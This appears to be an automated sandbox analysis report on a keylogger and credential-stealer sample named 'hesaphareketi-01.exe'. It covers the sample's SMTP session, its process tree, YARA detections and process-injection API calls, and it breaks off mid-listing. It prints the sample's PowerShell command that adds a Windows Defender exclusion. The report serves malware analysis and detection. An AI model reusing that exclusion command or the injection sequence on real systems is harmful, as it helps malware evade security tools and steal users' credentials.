Oct 3, 2024 09:11:51.575171947 CEST	587	49734	77.245.159.27	192.168.2.9	354 Start mail input; end with <CRLF>.<CRLF>
Oct 3, 2024 09:11:51.576186895 CEST	49734	587	192.168.2.9	77.245.159.27	.
Oct 3, 2024 09:11:52.146908045 CEST	587	49734	77.245.159.27	192.168.2.9	250 Requested mail action okay, completed
Oct 3, 2024 09:13:28.105871916 CEST	49734	587	192.168.2.9	77.245.159.27	QUIT
Oct 3, 2024 09:13:28.340640068 CEST	587	49734	77.245.159.27	192.168.2.9	221 Service closing transmission channel

Target ID:	0
Start time:	03:11:16
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\hesaphareketi-01.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hesaphareketi-01.exe"
Imagebase:	0x900000
File size:	884'736 bytes
MD5 hash:	1A2030277B88A72FEAC4F57F6514494A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:11:17
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"
Imagebase:	0x8f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:11:17
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\hesaphareketi-01.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hesaphareketi-01.exe"
Imagebase:	0x750000
File size:	884'736 bytes
MD5 hash:	1A2030277B88A72FEAC4F57F6514494A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3895077200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	03:11:17
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:11:20
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff72d8c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.3%
Total number of Nodes:	272
Total number of Limit Nodes:	17

Executed Functions

Function 02D16FD8 Relevance: 2.2, Strings: 1, Instructions: 939
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$'q, xrefs: 02D17040

Memory Dump Source

Source File: 00000000.00000002.1457268900.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d10000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID: $'q
API String ID: 0-3923516549
Opcode ID: e7ff9438fb8fab251447843033bcd9a2d6aa459eca7f39f222c90d8866f29cdf
Instruction ID: 1f3a16cee0b2be0f5a950ab8c58d683362f405ac75f38335466252eda948f2db
Opcode Fuzzy Hash: e7ff9438fb8fab251447843033bcd9a2d6aa459eca7f39f222c90d8866f29cdf
Instruction Fuzzy Hash: CEA2D534A11219DFDB15DF64C898AD9B7B2FF8A301F1181E9E509AB361DB31AE85CF40

Function 02D16FE8 Relevance: 2.2, Strings: 1, Instructions: 936
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$'q, xrefs: 02D17040

Memory Dump Source

Source File: 00000000.00000002.1457268900.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d10000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID: $'q
API String ID: 0-3923516549
Opcode ID: cb2e7da288742bb16f2542bfd8a11519b29ef9dde645a2f1f1f29f65d12a335d
Instruction ID: 9e93df775e122603684499da57d3a0bf5b13d18d9da48090600b218f9508ca3f
Opcode Fuzzy Hash: cb2e7da288742bb16f2542bfd8a11519b29ef9dde645a2f1f1f29f65d12a335d
Instruction Fuzzy Hash: FFA2D434A11219DFDB25DF64C898AD9B7B2FF89301F1181E9E509AB361DB31AE85CF40

Function 06F64568 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 886ecd6123d39b99703b98e003a16ec590b6672c4f4189caa66d6d723e68f42e
Instruction ID: 42da9f2fcdc173c55ff523c434a15c65b874e601204fe4b8cac3aced7ed2cb85
Opcode Fuzzy Hash: 886ecd6123d39b99703b98e003a16ec590b6672c4f4189caa66d6d723e68f42e
Instruction Fuzzy Hash: AA410671D042198BEB44DFAAC8447EEFBF6BF89300F14C556E408BB254DB706985CBA0

Function 06F64578 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07860af62882db6feb3cd35bbe5e7bf9de16823b1e6bc247298bcc85fa7a6afb
Instruction ID: 94fa24ebfcca68b55ae2a6693604d1bd05fa5bde6c3886997f379fac1dc90116
Opcode Fuzzy Hash: 07860af62882db6feb3cd35bbe5e7bf9de16823b1e6bc247298bcc85fa7a6afb
Instruction Fuzzy Hash: 5A21AFB1D046189BEB58CFABD94479EFAF7AFC9300F14C06AD408B6264DB75094A8F90

Function 0133D051 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0133D0DE
GetCurrentThread.KERNEL32 ref: 0133D11B
GetCurrentProcess.KERNEL32 ref: 0133D158
GetCurrentThreadId.KERNEL32 ref: 0133D1B1

Memory Dump Source

Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 18bc46afe6110766856d8d1ab3a8f0c9a961ec20a1875b4b9e3d9f00b66e600e
Instruction ID: 3a65074a49b928dcf7440cf52b4d9c0705248a7a09ed797081c43a697d97928a
Opcode Fuzzy Hash: 18bc46afe6110766856d8d1ab3a8f0c9a961ec20a1875b4b9e3d9f00b66e600e
Instruction Fuzzy Hash: CC5156B0D007498FDB54CFAAD948BEEBBF1AF88314F24855AE009A7350D7749948CF65

Function 0133D060 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0133D0DE
GetCurrentThread.KERNEL32 ref: 0133D11B
GetCurrentProcess.KERNEL32 ref: 0133D158
GetCurrentThreadId.KERNEL32 ref: 0133D1B1

Memory Dump Source

Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ae80e108ac183a1aba35e2881de809331ecf4f98667f3e34b120ace2dfeb01f8
Instruction ID: c18ae10c783735a630357b351bc0c5b641ef99dfc6446310e50492d280d8b442
Opcode Fuzzy Hash: ae80e108ac183a1aba35e2881de809331ecf4f98667f3e34b120ace2dfeb01f8
Instruction Fuzzy Hash: 395145B0D007498FDB54CFAAD948BDEBBF1AF88314F208559E019A7350D7749948CF69

Function 02D11790 Relevance: 1.8, APIs: 1, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1457268900.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d10000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a1c4881a546640fae4e613320a2b562d67d194af09a66ee2f0c13b0d038aa0
Instruction ID: a6cc6ea5e830f15ab02dc56f541e8431f2c6884143f0f5472c148ecb0484b068
Opcode Fuzzy Hash: 67a1c4881a546640fae4e613320a2b562d67d194af09a66ee2f0c13b0d038aa0
Instruction Fuzzy Hash: 5EA17DB5C093899FDB02CFA5D8546CDBFB1EF5A300F19819AE588AB262D3709846CF51

Function 06F6A55C Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F6A79E

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7386423b45cbbf0f67c92ed558eee4fb44dd8a498a6397134b094a3951183a21
Instruction ID: c0d9941be6697bd4c5ae3a551493c88544cb1af51ee2389b5b28f9587d7170fb
Opcode Fuzzy Hash: 7386423b45cbbf0f67c92ed558eee4fb44dd8a498a6397134b094a3951183a21
Instruction Fuzzy Hash: 1FA16A71D002599FEF50CFA9C8417EEBBB2BF49304F1485A9E808B7290DB759986CF91

Function 06F6A568 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F6A79E

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4f830672dce493bdb2e31d7d2bcef6657ed472823ef11bba23eb9f4a4e3dbe16
Instruction ID: 8ebedd2d3a60aa8bbe7b0b88acbe9d7ecea19d3b0167675fe27d2a9ecbccf1f8
Opcode Fuzzy Hash: 4f830672dce493bdb2e31d7d2bcef6657ed472823ef11bba23eb9f4a4e3dbe16
Instruction Fuzzy Hash: C1916A71D002599FEF50CFA9C8407EEBBB2BF49314F1485A9E808B7290DB759985CF91

Function 0133ADC8 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0133B01E

Memory Dump Source

Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e6a46f8b25b4fc76bde6dcf1dd5f6eb3b1757f9683fabc082f3b0be59114bd3b
Instruction ID: f4d7a582c1524da0a6517f79f758775df234fe986aeb6876ed519f62831c3b18
Opcode Fuzzy Hash: e6a46f8b25b4fc76bde6dcf1dd5f6eb3b1757f9683fabc082f3b0be59114bd3b
Instruction Fuzzy Hash: AF814670A00B058FEB24DF2AD45479ABBF1FF88204F008A2DD08ADBA50D775E849CF95

Function 02D118F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02D11A02

Memory Dump Source

Source File: 00000000.00000002.1457268900.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d10000_hesaphareketi-01.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 797c33b3ffcbee4d10a0a90b71c057a813de5a179e5bf6824365dbecddc0a084
Instruction ID: 03367d21d8e676f6723e93b9d3099e2175032083773b191d4978b993d6cce52c
Opcode Fuzzy Hash: 797c33b3ffcbee4d10a0a90b71c057a813de5a179e5bf6824365dbecddc0a084
Instruction Fuzzy Hash: 5E41CEB1D04349AFDB14CF9AD884ADEBFB5BF48310F24812AE819AB250D7709985CF94

Function 013344B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013359C9

Memory Dump Source

Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2c25eea2dc8ea7f59473c8bd3e858402cd616c30809533daff9bdade38bde2b0
Instruction ID: 4de9666668edf8e8288952bdcbbc54433a3e910ded88e92538ab69291eece8a4
Opcode Fuzzy Hash: 2c25eea2dc8ea7f59473c8bd3e858402cd616c30809533daff9bdade38bde2b0
Instruction Fuzzy Hash: B241B2B0C0071DCBEB24CFAAC844BDEBBB5BF49704F20806AD409AB251D7B55945CF94

Function 0133590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013359C9

Memory Dump Source

Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f07973e9399724b0133a28752e20f65e4b779d3e24a10d5935b654bf437cb5cb
Instruction ID: 0e99cf33b11eaec1e87f7b400fed737cab7146a649ee541dc97c144500c8fbdf
Opcode Fuzzy Hash: f07973e9399724b0133a28752e20f65e4b779d3e24a10d5935b654bf437cb5cb
Instruction Fuzzy Hash: 7441D270C00719CFEB25CFAAC8847CDBBB5BF49314F24816AD418AB291D7755946CF50

Function 02D14040 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 02D14101

Memory Dump Source

Source File: 00000000.00000002.1457268900.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d10000_hesaphareketi-01.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 882afbaf0bfe50c9dcff69f6bcd3b616048c6a4d3c2dcc467e18e08efed5671d
Instruction ID: 57d98d27630f9f8493b0f4d1b030fd04040ddcbe0864b23be8d291ddc0a8e03c
Opcode Fuzzy Hash: 882afbaf0bfe50c9dcff69f6bcd3b616048c6a4d3c2dcc467e18e08efed5671d
Instruction Fuzzy Hash: 93410AB5A00309DFDB14CF95D848BAABBF5FB88314F24C499D519AB321D375A845CFA0

Function 06F69ED8 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F69F70

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b7efc460efe21f01cf27bcd4d3d4c4de0d8efe826b9e24cc641baffbc38b42f4
Instruction ID: 0356664ebb2cd95b8046b3f42dcb99990507d7dc14c3a99803fac082e3f50262
Opcode Fuzzy Hash: b7efc460efe21f01cf27bcd4d3d4c4de0d8efe826b9e24cc641baffbc38b42f4
Instruction Fuzzy Hash: E0212475D003499FDB10CFAAC885BEEBBF5FF48310F10842AE959A7240C7B89944CBA5

Function 06F69EE0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F69F70

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c49de3ce530ae4ff6b932f098a75823c24e1143c8ea9847ba200e1fad4b3a692
Instruction ID: 38203abf90bcbab9492219ce49ee94b0732c52b434362473dc23ba106d7c8ac0
Opcode Fuzzy Hash: c49de3ce530ae4ff6b932f098a75823c24e1143c8ea9847ba200e1fad4b3a692
Instruction Fuzzy Hash: 10212475D003499FDB10CFAAC885BEEBBF5FF48310F10842AE919A7240C7B89944CBA4

Function 0133D6A9 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D737

Memory Dump Source

Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0270e2afc838d63a99f2635e929bebca4e566f26429f582d1b7d11be14cbe350
Instruction ID: 240b5d9f0c2c225f35f30b7785287318b55f4734b695163faca3ea46720d70a4
Opcode Fuzzy Hash: 0270e2afc838d63a99f2635e929bebca4e566f26429f582d1b7d11be14cbe350
Instruction Fuzzy Hash: AE2114B5900248DFDB11CFAAD485AEEBFF5FB48314F14801AE958A3310C374A945CF64

Function 06F69FD0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F6A050

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b52d8c34ff349d08724038e94909119c8a72a501173a868f00441156a21f3676
Instruction ID: a490ff969c90b33914daf8d5f6c685fd6df241cca4890c129a277e5583da4eec
Opcode Fuzzy Hash: b52d8c34ff349d08724038e94909119c8a72a501173a868f00441156a21f3676
Instruction Fuzzy Hash: 5521F571C003499FDB10DFAAC885BEEBBF5FF48310F10842AE959A7240D7799944DBA5

Function 06F69FC9 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F6A050

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b402adfc9bc670bb1384acf5dd732f6d4a57d09a506d7b54374eb68cabfd4e32
Instruction ID: 7b647c279e925889f8d3c1d67c03d6fc8c958046c37d09aa09361d41587851c1
Opcode Fuzzy Hash: b402adfc9bc670bb1384acf5dd732f6d4a57d09a506d7b54374eb68cabfd4e32
Instruction Fuzzy Hash: 1C2105B1C003499FDB10CFAAC885BEEBBF5BF48310F10842AE959A7240D7799951DF65

Function 06F69910 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F6998E

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 41f1ac22e7126c79d467876095c76d3aef265c012f8917e135c0ef2cb3d70a49
Instruction ID: c8fa3987a75e11ebf79f8d2f469dd8fb636fc4cb01057b6efb3e5fa9f4b2d12b
Opcode Fuzzy Hash: 41f1ac22e7126c79d467876095c76d3aef265c012f8917e135c0ef2cb3d70a49
Instruction Fuzzy Hash: 7D214971D003098FDB10CFAAC4857EEBBF4EF48314F14842AE459A7240D7B89944CFA5

Function 06F6990A Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F6998E

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3b5bf4798b429ad3b5d87948ccfb3f6f4786625df8aecd7c92233cf54f2aa8a3
Instruction ID: e2e2e7d0b27cf694809663386d49a6e1a58982e9c2e3053e48a1ebff49b44dfb
Opcode Fuzzy Hash: 3b5bf4798b429ad3b5d87948ccfb3f6f4786625df8aecd7c92233cf54f2aa8a3
Instruction Fuzzy Hash: 3F213471D003098FDB50CFAAC4857EEBBF4EF48324F14842AE459A7240D7B89985CFA5

Function 0133D6B0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D737

Memory Dump Source

Source File: 00000000.00000002.1452258415.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1330000_hesaphareketi-01.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 882da61d081dbfa3da533060dc837862668bb190fc699f3bbe14f76a2e492686
Instruction ID: f87f32f04dc3db038cd62072c85d4a9d1eda15091b1d666459984a0e8dcf6f5e
Opcode Fuzzy Hash: 882da61d081dbfa3da533060dc837862668bb190fc699f3bbe14f76a2e492686
Instruction Fuzzy Hash: AA21C2B5900248DFDB11CFAAD884ADEBBF8FB48324F14841AE958A7350D374A954CFA5

Function 06F69E18 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F69E8E

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ed0b266e177b4e931fd28bf5d49e20227dda58ac000a2762ad5f10b9b992d67b
Instruction ID: 22ee3d1a2af531ff59cdd13fdecc8474f1da7c9725e94920b4f67d38c481ccc3
Opcode Fuzzy Hash: ed0b266e177b4e931fd28bf5d49e20227dda58ac000a2762ad5f10b9b992d67b
Instruction Fuzzy Hash: C91144768003499FDB10CFAAC8447EEBBF5FF48324F20881AE559A7250C7769941CFA5

Function 06F69E20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F69E8E

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 65b2a45e6f5eedec2074c957cc19fadcf08416b75018a0fd116095f12241c67e
Instruction ID: 3526da7a9cbbc32628ce45f51d9c1e9f621ae90e6ce53e4598b7b1e43b318c83
Opcode Fuzzy Hash: 65b2a45e6f5eedec2074c957cc19fadcf08416b75018a0fd116095f12241c67e
Instruction Fuzzy Hash: 4C1126728003499FDB10DFAAC844BDFBBF5EF48320F14841AE519A7250C7B59940CFA5

Function 06F69420 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F6948A

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 323af4fa292d7e2b94b1afdb9b80c76a6cd93cc2adbc7ac77a322201500674c8
Instruction ID: 89026ca0f25710a9a047882547bd8a5c3bb63ee4bc32262aecca186ec6e0f26e
Opcode Fuzzy Hash: 323af4fa292d7e2b94b1afdb9b80c76a6cd93cc2adbc7ac77a322201500674c8
Instruction Fuzzy Hash: 311158B5C003498FDB20CFAAC8457EEFBF4EF48224F24882AD559A7240C7B59544CFA5

Function 06F69428 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F6948A

Memory Dump Source

Source File: 00000000.00000002.1461386946.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f60000_hesaphareketi-01.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 96f9a75bed555f7f1f3d7c104d79673e5e7bfbf0e3bc325a5c0609fc63358e05
Instruction ID: df9c9d6ee8c42aa6fd094a94217f909846bf10e357e451da981cb191ef9d957f
